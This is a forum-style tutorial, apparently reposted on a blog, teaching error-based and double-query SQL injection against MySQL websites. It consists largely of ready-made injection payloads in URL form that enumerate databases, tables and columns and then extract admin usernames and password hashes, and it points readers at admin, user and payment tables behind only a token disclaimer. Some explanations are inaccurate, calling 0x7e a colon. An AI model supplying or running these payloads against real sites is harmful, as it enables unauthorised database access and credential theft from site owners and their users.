[TUT]SQL Injection - Error Based and Double Query.
Hello, Top-Hat-Security members.
This tutorial is purely for educational purposes!
Any misuse of my tutorials is at own risk!
We will need a few things for this tutorial.
Its a lot more complicated then my last 2 tutorials.
1. Firefox Download latest version of Firefox (For hackbar add-on)
2. Hackbar Install hackbar on FireFox (To easily adapt complex attack vectors).
3. Any text editor. (To paste the database information).
First of all i would like to explain what error based SQL injection is.
And then explain the difference between error based and Double Query SQL Injection.
Error based:
By injecting a specific query, i will show you this later in the tutorial. We get an error message returning in the page.
This msg actually gives us sensitive database information. That's why we call this error based SQL injection.
Double Query:
Works exactly the same as error based injection but, the Error Based Query will be doubled as a single query statement.
So that we again successfully get an error message.
Now, that was a short explanation of error and double query based SQL Injection i made here!
This should give you a basic idea of what we are dealing with!
Let's get started!
Determine when we should use error or double query Injection.
When you did order by and got the column count <you can learn this method in my first tutorial>.
And, you switch over to union select statements the page then returns an error saying something like:
Case 1:
Code: [Select]
The Used Select Statements Have Different Number Of Columns.Case 2:
Code: [Select]
Unknown column 1;Case 3:
Code: [Select]
Nothing returns at all. And you can't find the columns on the web content.
Then you can also use error based Injection.These are the most common cases when we can use error based and double Query Injection.
Now that we know when to use this and you have a page whit a case like that let's move on!
Using Error based injection.
2. Get the Database Name.
3. Get the Table Names.
4. Get the Column Names.
5. Extracting Information from the Columns.
Get the MySQL Version.
The query to get the MySQL version for error based injection is:
Code: [Select]
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--What does this line of code actually say?
We need to group by concat_ws because this concat allows us to inject more then one statement at a time.
In this case injecting a colon(ox3a) and the version. All the other stuff is to actually retrieve info in our error msg.
Returned error message:
Code: [Select]
Duplicate entry '~'5.1.41'~1' for key 1This means this Web Page has MySQL version 5.1.41.Get the Database Name.
To get the database name it's already a little more complicated.
First of all there can be more then one database on a server. Ill explain how to find those as well!
The Query to get database names:
Code: [Select]
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)Look closely at this query! Look for limit 0,1 This is how we find more databases inside a server.
If we edit 0,1 to 1,1 and keep increasing 2,1 and further until you don't see any changes any more.
That way you know you got all databases. Put those in a notepad you will need the first later on in this tutorial.
What does this query tell us?
In concat we can select more then on statement as i said before whit the version. This way we now select the database name using a method called cast.
You will be seeing more about cast as you advance in SQL Injection. We say we want to get the database (as char) in characters from information_schema which is the database.
Code: [Select]
Duplicate entry '~'Ignotus_1' for key 1That means our database name is Ignotus_1.When i increased the limit nothing changed meaning we have only one database.
Write down that database name you will be needing that name.
Get the Table Names
Now we are getting somewhere we need the more difficult stuff. Getting the table names.
Be sure to use the hackbar because it really eases you're stuff.
The Query to get the Table names:
Code: [Select]
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)Yet again i use the limit function here. Only that way you can get all tables using error based injection.
By increasing that limit as previously explained you will find them all.
As i said in my first tutorial always look for useful tables. Admin tables, members tables, user anything to do whit user credentials is interesting.
For black hats probs shop tables or payments sections are interesting as well but i don't want to support black hatting!
What does this extremely large Query tell us?
Using the select in the concat method again and whit casting table_name as characters we ask the table name from the information_schema (database).
Thats the easyest explenation i can possebly give.
For limit 0,1:
Code: [Select]
Duplicate entry '~'tbl_news' for key 1For limit 1,1:
Code: [Select]
Duplicate entry '~'tbl_gallery' for key 1For limit 2,1:
Code: [Select]
Duplicate entry '~'tbl_userAdmins' for key 1Finally something usefull: tbl_userAdmins.
Now that we have ourselves an interesting table we want to extract information out of it.
Get the Column Names
Yet another step further this won't get more easy. And this is still regular error based people.
SQL Injection is hard you need your brains!
The Query to extract the column names from tables:
Code: [Select]
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)It is important to look at this code where it said TABLENAMEHERE we need to put our table in hex.Be sure that 0x is in front so the MySQL server knows what it is.In the hackbar go over to encoding there choose encode in hex first format. Or go to the next site and put the table name on where is sais "Say hello to my little friend" http://www.swingnote.com/tools/texttohex.php. There is also a limit behind our hex.
We are going to need this limit to successfully extract all columns.
In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)Now what does our Query tell us?
We select the column_name using cast and want it to return in characters using as char, from the database but this time also from the table.
The one we put there in hex. And whit a limit to get all the different columns in there.
Now my first error is:
Code: [Select]
Duplicate entry 'admin_NAME' for key 1That will get us the admin name we need. If you haven’t got that just increase the limit.
Now i need my next column i need the passwords of course. For sake of simplicity that’s my next one.
Error code:
Code: [Select]
Duplicate entry 'admin_PWD' for key 1Now we finally get on to the fun part where we get our admin / PWD!!Extracting Information from the Columns.
Every one likes this part! The part where we finally get to something!
Any ways i have to tell you this is only half of the tutorial. We only covered error based. Double Query is beyond this part.
(Beware where it said admin_Name and admin_PWD you have to replace whit the username and password column you extracted before!
Also where it says tbl_userAdmins put your table name where you extracted the columns from.
Almost forgotten the database name did ya?? Well this is where you need it. Where it said Ignotus_1 there is where you put the database name.)[/size]
Our Query to extract information:
Code: [Select]
and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)What does this Query tell us?
We select using the concat and cast (selecting admin_NAME 0x7e (colon) to put admin name and admin_PWD together in our error message.
As char (in characters) from the database (Ignotus_1) of the table: tbl_userADMINS.
Our error MSG:
Code: [Select]
Duplicate entry 'uSploit~4c0e8eb3ed67f58dc56e724e5297a598~1' for key 1Congratulations you successfully injected a vulnerable to error based SQL Injection website. (mouth full)
Username: uSploit
Password: 4c0e8eb3ed67f58dc56e724e5297a598n <-- this is MD5 I won't teach you how to decrypt hashes.
Using Double Query Injection
1. Get the MySQL Version.
2. Get the Database Name.
3. Get the Table Names.
4. Get the Column Names.
5. Extracting Information from the Columns.
Short explanation:
Now I haven’t been explaining this so well, i will take my time to make this clear to you.
This method is almost exact the same as error based but it uses 2 query's in one syntax.
This way it makes the database respond whit the things we ask.
You can see this as overloading someone whit so many information he has no other choice then to give the answer.
Get the MySQL Version.
Before you start you're way up to the end of this tutorial. Take a look at the Query below and one of error based injection.
There is a lot of difference in the query's don't mess em up.
Our Query for the version! (Double Query):
Code: [Select]
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Now what does this extremely large query tell us?
We yet again select multiple statements using the concat method and whit double query cast the version as characters .
We want this from information.schema (database) and we add and 1=1 at the end of our query to make it return true.
Error message:
Code: [Select]
Duplicate entry '5.1.65-cll' for key 1It is a must to keep your query's clean there for yet again i advice the hackbar. Because one thing wrong results in an error without information.
We don't want that to happen do we
. Let us get the database name.Get the Database Name.
This is our query to get the database names:
Code: [Select]
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1As you have seen in error based the limit here is important. If you want to get all database names.I won't be explaining everything as i usually do ill ad up what is new. This really reduces my writing time.
Here we select scheme_name (database) as characters. Whit the first LIMIT only the first increasing you get all database names.
Error code:
Code: [Select]
Duplicate entry 'Ignotus_1' for key 1Our database is Ignotus_1. Now its important to write down the database name.Get the Table Names.
Same as in error based the query's become more difficult as we advance! Keep attention and you will pick this up.
!!Where it said 0x Ignotus_1 we need to ad the database name in HEX. The 0x in front is IMPORTANT!!
Our Query to extract our table names:
Code: [Select]
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1As we have learned for a few times now the limit will get us all tables. Keep increasing the first limit in the query until you have all tables. (The one behind our database name in HEX).
Short explanation of what’s new in our query:
We again want the table names as characters shown in our error output.
Our database to select the table names from with a limit to get all tables.
Now you should have a list of table names and look for a useful one.
Mine is USERS. Same as with error based we now want the column names of that table.
Error code:
Code: [Select]
Duplicate entry 'USERS' for key 1Get the Column Names.
!!Here we have to edit a few things again, Where it said 0xIgnotus_1 put your database name in HEX.
And where it said 0xUSERS put your table name you are going to use don't forget the 0x has to be there in order for MySQL to translate it. !!
Another mind blowing query for extracting the columns:
Code: [Select]
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Yet again here is a limit the first one behind our database name in HEX, if we increase that limit we will get all columns.
Short explanation of our new vector:
We want the column names from our database which is in hex and we want to select those column names from the table we chose and put in hex.
Error code:
Code: [Select]
Duplicate entry 'Usernames' for key 1Second error using a limit:
Code: [Select]
Duplicate entry 'Passwords' for key 1Now we want to extract all the info we can get from these columns. Username and Password.
Extracting Information from the Columns.
Finally, Finally and Finally we are getting to an end i am getting bored writing anyway!
This is the part where we all know we get what we want!
!!First of all there needs a little bit changing done in our query again!
Where it said USERS.Username is where you put your table name and next your column name.
Yes This time we need 2 Query's in order to get Username and password. And Where it said Ignotus_1 we put our database name. (not in hex this time).!!
This is our query to extract all data from our columns:
Code: [Select]
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1In URL:
Code: [Select]
http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Error message:
Code: [Select]
Duplicate entry 'uSploit' for key 1Now for our passwords we only need to edit Username into passwords and execute.
This wil result in an error providing us the password.
Error message:
Code: [Select]
Duplicate entry '4c0e8eb3ed67f58dc56e724e5297a598n' for key 1Username: uSploit
Password: 4c0e8eb3ed67f58dc56e724e5297a598n
That is enough ass hurting for today.
Thanks for taking your time, hope you enjoyed!
~ uSploit
0 nhận xét:
Đăng nhận xét